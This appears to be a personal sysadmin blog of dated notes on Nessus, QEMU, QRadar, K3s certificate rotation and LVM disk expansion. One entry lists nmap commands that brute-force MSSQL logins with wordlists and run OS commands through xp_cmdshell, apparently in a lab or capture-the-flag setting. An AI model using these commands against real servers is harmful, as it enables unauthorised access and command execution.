Wednesday, November 9, 2022

Rename Nessus Scanner for Tenable.io

Step-by-step Instructions:
 

1. Login to Tenable Core + Nessus using the link and credentials provided in your email. Be sure to check
the field Reuse my password for privileged tasks.
 

2. Click Terminal.
 

3. Type sudo /opt/nessus/sbin/nessuscli managed unlink
 

a. Note: If prompted for a password, type <nessus admin password>
 

4. Type sudo /opt/nessus/sbin/nessuscli managed link --key={your linking key} --cloud --name={your-name}_Scanner_Added

Tuesday, August 30, 2022

QEMU: how to create ubuntu vm

Create Ubuntu VM

qemu-img create -f qcow2 disk.qcow2 10G
  • Create an empty file for persisting UEFI variables:
dd if=/dev/zero conv=sync bs=1m count=64 of=ovmf_vars.fd
  • Run qemu with the following command-line arguments:
qemu-system-aarch64 \
    -accel hvf \
    -m 2048 \
    -cpu cortex-a57 -M virt,highmem=off  \
    -drive file=/usr/local/share/qemu/edk2-aarch64-code.fd,if=pflash,format=raw,readonly=on \
    -drive file=ovmf_vars.fd,if=pflash,format=raw \
    -serial telnet::4444,server,nowait \
    -drive if=none,file=disk.qcow2,format=qcow2,id=hd0 \
    -device virtio-blk-device,drive=hd0,serial="dummyserial" \
    -device virtio-net-device,netdev=net0 \
    -netdev user,id=net0 \
    -vga none -device ramfb \
    -cdrom /path/to/ubuntu.iso \
    -device usb-ehci -device usb-kbd -device usb-mouse -usb \
    -monitor stdio
  • You should be able to install Ubuntu as normal
  • If you want a desktop environment, you can install it using sudo apt-get install ubuntu-desktop

Saturday, August 27, 2022

QRadar: SSH to host fails with error "No ECDSA host key is known for and you have requested strict checking"

Troubleshooting

Problem

SSH and any application that uses SSH to establish connections such as SCP and RSYNC fail to connect to an unmanaged QRadar® appliance. This issue affects procedures such as copying QRadar® SFS files to patch a host to match the Console's version before adding the appliance to the deployment.

 

Symptom

The SSH connection attempt fails with the error:
 
# ssh <Remote Host IP>
ERROR: No ECDSA host key is known for <Remote Host IP> and you have requested strict checking.
ERROR: Host key verification failed.

Cause

When "strict checking" is enforced, the SSH connections to a host require the host's public host key to previously exist in the /root/.ssh/known_hosts file.
 
On older versions, the missing key entry generated a warning. The administrator could choose Y to proceed with the connection or abort it.

Environment

QRadar® 7.4.2 and later.

Resolving The Problem

  1. Log in to the host originating the SSH connection.
  2. SSH to the remote host disabling the strict checking. This will add the entry in the /root/.ssh/known_hosts file.
    Note: This command is a one-time disabling of the strict check to allow for changes to the known_hosts file. Future attempts will use strict checking.
     
    # ssh <Remote Host IP> -o StrictHostKeyChecking=no
    Warning: Permanently added '<Remove Host IP>  (ECDSA) to the list of known hosts.
    root@<Remove Host IP> 's password:
  3. SSH to the remote host and the connection is established.
     
    # ssh <Remote Host IP>

Reference:

https://www.ibm.com/support/pages/qradar-ssh-host-fails-error-no-ecdsa-host-key-known-and-you-have-requested-strict-checking

How to create private registry and configure Apphost for serving apps while installing

Development environment side: CentOS 8
--
okanx@control-plane ~]$ cat /etc/docker/daemon.json
{
"insecure-registries" : ["172.16.60.128:5000"]
}


okanx@control-plane ~]$ cat /opt/docker-registry/docker-compose.yml
version: '3'

services:
  registry:
    image: registry:2
    ports:
    - "5000:5000"
    environment:
      REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY: /data
    volumes:
      - ./data:/data

[aokanx@control-plane ~]$ cd /opt/docker-registry/
[aokanx@control-plane docker-registry]$ docker-compose up



Apphost side:
--

[root@apphost ~]# cat /etc/rancher/k3s/registries.yaml
mirrors:
  "172.16.60.128:5000":
    endpoint:
      - "http://172.16.60.128:5000"
[root@apphost ~]# manageAppHost registry --registry=172.16.60.128:5000

QRadar SOAR (Resilient): Expired K3s certificates are not automatically rotated causing connection issues on Apphost

Problem

Cached K3s certificates are not cleared when automatically rotated.

K3s generates internal certificates with a 1-year lifetime. Restarting the K3s service automatically rotates certificates that expired or are due to expire within 90 days. However, the version of K3s used with App Host does not clear out the cached certificate, which causes the same problem. Therefore, the cache needs to be cleared manually.



Symptom

Using the kubectl cli tool results in the following error:
 Unable to connect to the server: x509: certificate has expired or is not yet valid
***Note: Apps that are currently running continue to run with no issues

Cause

The currently used version of K3s (v1.18) does not clear the cached certificate.  So even if the certificates are rotated by a K3s restart, the problem persists.

Diagnosing The Problem


Changes to an existing app that uses the SOAR platform does not succeed. This includes file changes, secret changes, deploy or undeploy, and upgrade requests.

Installing a new app, the status remains in a ‘Deploying’ state. A tooltip instructs the user to run sudo appHostPackageLogs. Running this command or any other command that starts with kubectl gives you the following error:

#: kubectl get pods -A
Unable to connect to the server: x509: certificate has expired or is not yet valid

You can check the expiration data of a cached certificate by running the following command on the App Host server:
openssl s_client -connect localhost:6443 -showcerts < /dev/null 2>&1 | openssl x509 -noout -enddate 


Resolving The Problem

As a precautionary measure backup the TLS dir.

sudo tar -czvf /var/lib/rancher/k3s/server/apphost-cert.tar.gz /var/lib/rancher/k3s/server/tls

Remove the following file.

sudo rm /var/lib/rancher/k3s/server/tls/dynamic-cert.json

Remove the cached certificate from a kubernetes secret.

sudo kubectl --insecure-skip-tls-verify=true delete secret -n kube-system k3s-serving

Restart the K3s service to rotate the certificates.

sudo systemctl restart k3s

Verify that kubectl commands function.

sudo kubectl get pods -A

Additionally, you can verify that all K3s internal certificates are no longer due to expire.

sudo su
for i in `ls /var/lib/rancher/k3s/server/tls/*.crt`; do echo $i; openssl x509 -enddate -noout -in $i; done

Or run

curl -v -k https://localhost:6443 [https://localhost:6443] to confirm the new date of your app host cert

 

 

Reference:

https://supportcontent.ibm.com/support/pages/expired-k3s-certificates-are-not-automatically-rotated-causing-connection-issues

QRadar: log source management legacy url

If you cannot access Log Source Management App. You can try to use legacy url:

https://10.10.2.10/console/do/core/genericsearchlist?appName=eventviewer&pageId=SensorDeviceList

Friday, August 26, 2022

How to filter QRadar peaks and solve performance issues

Step 1:

Get peak date time information from logs

cat qradar.log |grep SourceMonitor |grep ecs-ec-ingress |sed -r 's#^(.+?)::.+ Peak in the last 60s: (.+?)\. Max Seen.+#\1 \2#'

 

Step 2:

Go to QRadar UI and query that time period and group by EventID or SourceIP for detecting root cause of the problem.


Step 3: 

If the traffic which causes the peaks is abnormal, if it is possible try to drop unnecessary traffic at the log source level by solving the root cause of the problem.

QRadar: How to export all referencedata

 /opt/qradar/bin/contentManagement.pl -a export -c referencedata -i all -e

Wednesday, August 17, 2022

Get IP count stats for syslog traffic

 tcpdump -nns0 -i any -c 100000 dst port 514 |awk '{print $3}' |cut -d. -f1-4 |sort -V |uniq -c |sort -n

Tuesday, August 9, 2022

QRadar: snmpwalk: Failure in sendto (Operation not permitted)

[root@console snmp]# snmpwalk -Os -c public -v 2c 127.0.0.1:8001 iso.3.6.1.2.1.1.1
snmpwalk: Failure in sendto (Operation not permitted)



I solved it by changing port number to 8002 and with additional iptables rules.

# Default iptables rules block 8001 traffic.

[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT

# solution

[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT

[root@console ~]# iptables-save

QRadar: extract test steps of a specific offense rule

 /opt/qradar/support/extractRules.py -o QRadarRules.tsv 

# psql -t -A -U qradar -c "SELECT rule_data FROM custom_rule WHERE id=100311" | xmllint --xpath "//rule/testDefinitions/test/text" - | perl -MHTML::Entities -pe 'decode_entities($_);' |sed -e 's/<[^>]*>//g'

QRadar: Ariel query for getting related usernames in an offense

 AQL query:

SELECT username FROM events  WHERE INOFFENSE(ID) GROUP BY username

QRadar: Ariel query for getting related remote IPs in an offense

AQL query for getting remote ip addresses which is related with specific offense:

select distinct destinationip from events where INOFFENSE(633) TIMES OFFENSE_TIME(633) AND eventdirection IN ('L2R', 'R2R') 


Tuesday, August 2, 2022

nmap scripts for mssql servers

 nmap -p 1433 10.0.30.0/24

nmap --script ms-sql-info -p 1433 10.0.30.33

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.0.30.33

nmap -p 1433 --script ms-sql-empty-password 10.0.30.33

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.0.30.33 -oN output.txt
gvim output.txt

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.0.30.33

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" 10.0.30.33

QRadar SOAR: How to increase partition size by using a new disk on RHEL with LVM

 Steps:

Steps to add a new hard disk to LVM on IBM Security SOAR appliance running Red Hat Linux with LVM support:

1. In vSphere client, add a new hard disk at Virtual Device Node SCSI (0: 1).

2. SSH to the server.

3. Get the host bus number:
sudo grep mpt /sys/class/scsi_host/host?/proc_name
The response is similar to
/sys/class/scsi_host/host2/proc_name:mptspi

4. Rescan for new disks on host bus 2:
echo "- - -" > sudo /sys/class/scsi_host/host2/scan

5. Make sure new disk /dev/sdb is added to the system:
sudo fdisk -l

6. Create a new partition on /dev/sdb with file system type 8e (Linux LVM):
sudo fdisk /dev/sdb

=======
Command (m for help): n
Select (default p): p
Partition number (1-4, default 1): 1
First sector (a-b, default a): [Enter to use the default value]
Last sector, +sectors or +size{K,M,G} (a-b, default b): [Enter to use the default value]
Command (m for help): t
Hex code (type L to list all codes): 8e
Command (m for help): p
Command (m for help): w
=======

7. Create a physical volume for LVM:
sudo pvcreate /dev/sdb1

8. Get the volume group name (VG Name):
sudo vgdisplay

9. Extend the 'resilient' volume group by adding in the physical volume of /dev/sdb1:
sudo vgextend resilient /dev/sdb1

10. Scan all disks for physical volumes:
sudo pvscan

11. Check the volume group name (VG Name) again to make sure free space is added:
sudo vgdisplay

12. Display the path of the logical volume (LV Path):
sudo lvdisplay

The following assumes that you want to split the new disk over the three logical volumes.

13. Extend the logical volume for multiple logical volumes:
sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3

The previous commands allocate 80% of the extended space to "/dev/resilient/root" LVM, and then allocate the rest 20% to "/dev/resilient/co3" LVM.

14. Display the disk space usage to ensure new space is added:
sudo df -h

 

 

Reference:

 https://www.ibm.com/support/pages/node/1160644

Thursday, January 27, 2022

ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":

 Problem:

..

DEBUG vsphere_tag_category.category: Creation complete after 0s [id=urn:vmomi:InventoryServiceCategory:f49160e4-a017-404f-9ecf-88b93e02f300:GLOBAL]
DEBUG vsphere_tag.tag: Creating...                 
DEBUG vsphere_tag.tag: Creation complete after 0s [id=urn:vmomi:InventoryServiceTag:75e6da39-1493-4760-a360-5708375c1e49:GLOBAL]
DEBUG vsphereprivate_import_ova.import: Creating...
ERROR                                              
ERROR Error: failed to find provided vSphere objects: failed to find a host in the cluster that contains the provided datastore
ERROR                                              
ERROR   on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
ERROR   44: resource "vsphereprivate_import_ova" "import" {
ERROR                                              
ERROR                                              
FATAL failed to fetch Cluster: failed to generate asset "Cluster": failed to create cluster: failed to apply Terraform: failed to complete the change

..

Root cause of the problem:

This issue was caused by trying to use a datastore that was not shared storage on a cluster with multiple hypervisors.

 

Sunday, January 23, 2022

Saturday, January 22, 2022

Bulma.io: the modern CSS framework that just works.

 Bulma is a free, open source framework that provides ready-to-use frontend components that you can easily combine to build responsive web interfaces.

 https://bulma.io/

Themes:

https://jenil.github.io/bulmaswatch/